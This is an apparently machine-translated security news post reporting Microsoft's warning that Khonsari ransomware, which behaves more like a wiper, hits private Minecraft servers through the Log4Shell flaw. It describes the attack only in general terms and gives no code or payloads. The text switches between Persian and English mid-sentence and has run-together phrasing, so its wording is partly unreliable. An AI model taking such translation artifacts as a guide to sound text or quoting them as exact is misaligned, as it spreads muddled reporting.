حمله باج افزار خوانساری به سرورهای Minecraft

مایکروسافت urged administrators of private Minecraft servers (located on their own hosting) to update to the latest versions as soon as possible, as they are being attacked by the Khonsari ransomware that exploits the critical Log4Shell vulnerability.

Back last week, the developers behind Minecraft در Mojang Studios released an emergency security update to address the critical bug CVE-2021-44228.

This issue, recently discovered in the Log4j logging library in recent weeks, has been talked about around the world. This vulnerability is also known as Log4Shell and has the potential to become one of the worst bugs in recent years.

In Minecraft, the Log4j library is used by the Java Edition by the game client and multiplayer servers. مایکروسافت has now warned that the new vulnerability is already being actively used to attack private servers.

The attacker sends a malicious in-game message to the vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute the payload placed by the attacker on both the server and connected vulnerable clients. We saw the use of a malicious Java class, which is the Khonsari ransomware and is executed in the context of javaw.exe, to then demand a ransom.told in Microsoft.

مایکروسافت 365 Defender Threat Intelligence and Microsoft Threat Intelligence Center (MSTIC) also report that they observed PowerShell-based reverse shells deployed at corporate endpoints, where Log4j exploits targeting Minecraft servers were just an entry point.

As a result, Microsoft has asked all administrators to immediately install the latest updates to protect against attacks, and recommends that players connect only to trusted Minecraft servers and use the official and latest version of the client. Minecraft: Java Edition server administrators can find all necessary update instructions here.

At first glance, this malware appears to be exploiting the Log4Shell problem for ransomware attacks. با این حال, در واقعیت, Khonsari is more like a wiper, به این معنا که, it is adestructive malware that deliberately encrypts data beyond recovery. The fact is that the victims cannot contact the malware operators to pay the ransom (there are simply no contacts in the message that the extortionists leave behind), which means they cannot save their information.

Apparently, the attacks on Minecraft servers that have begun now are also carried out solely for the sake of griefing and trolling, and the malware operators do not pursue financial gain.

Let me remind you that we wrote that Researchers discovered ALPHV ransomware written in Rust, as well as that Chaos ransomware attacks Minecraft players.

هلگا اسمیت

من همیشه به علوم کامپیوتر علاقه داشتم, به خصوص امنیت داده ها و موضوع, که امروزه نامیده می شود "علم داده", از اوایل نوجوانی من. قبل از ورود به تیم حذف ویروس به عنوان سردبیر, من به عنوان کارشناس امنیت سایبری در چندین شرکت کار کردم, از جمله یکی از پیمانکاران آمازون. یک تجربه دیگر: من در دانشگاه های آردن و ریدینگ تدریس می کنم.

پاسخ دهید

این سایت از Akismet برای کاهش هرزنامه استفاده می کند. با نحوه پردازش داده های نظر خود آشنا شوید.

دکمه بازگشت به بالا